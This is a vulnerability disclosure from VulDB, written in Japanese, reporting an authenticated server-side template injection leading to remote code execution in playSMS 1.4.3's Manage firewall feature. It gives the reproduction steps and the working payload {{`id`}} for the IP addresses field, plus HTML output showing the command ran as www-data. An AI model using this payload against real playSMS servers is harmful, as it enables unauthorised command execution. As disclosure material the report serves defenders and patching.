提出 #363730: playSMS 1.4.3 Server Side Template Injection (SSTI)情報

タイトルplaySMS 1.4.3 Server Side Template Injection (SSTI)
説明PlaySMS 1.4.3 has authenticated Server Side Template Injection in Manage firewall. The manipulation of the argument IP addresses, that leads to a Authenticated RCE 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Click in Settings > Manage firewall (/index.php?app=main&inc=feature_firewall&op=firewall_list) 3. Click in Plus (+) icon to add new rule 4. Add payload {{`id`}} in "IP addresses " field and add an user field "Select username" 5. Save and back to Settings > Manage firewall http://172.16.1.195/playsms/index.php?app=main&inc=feature_firewall&op=firewall_list&search_keyword=&search_category=&page=1&nav=1 <tbody> <tr> <td>admin</td> <td>uid=33(www-data) gid=33(www-data) groups=33(www-data) </td> <td> <input type=hidden name=itemid[0] value="7"> <input type=checkbox name=checkid[0]> </td> </tr>
ソース⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/firewall
ユーザー
 Dhimitri (UID 45045)
送信2024年06月25日 01:03 (2 年 ago)
モデレーション2024年07月03日 07:29 (8 days later)
ステータス承諾済み
VulDBエントリ270277 [playSMS 1.4.3 Template IPアドレス 特権昇格]
ポイント20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!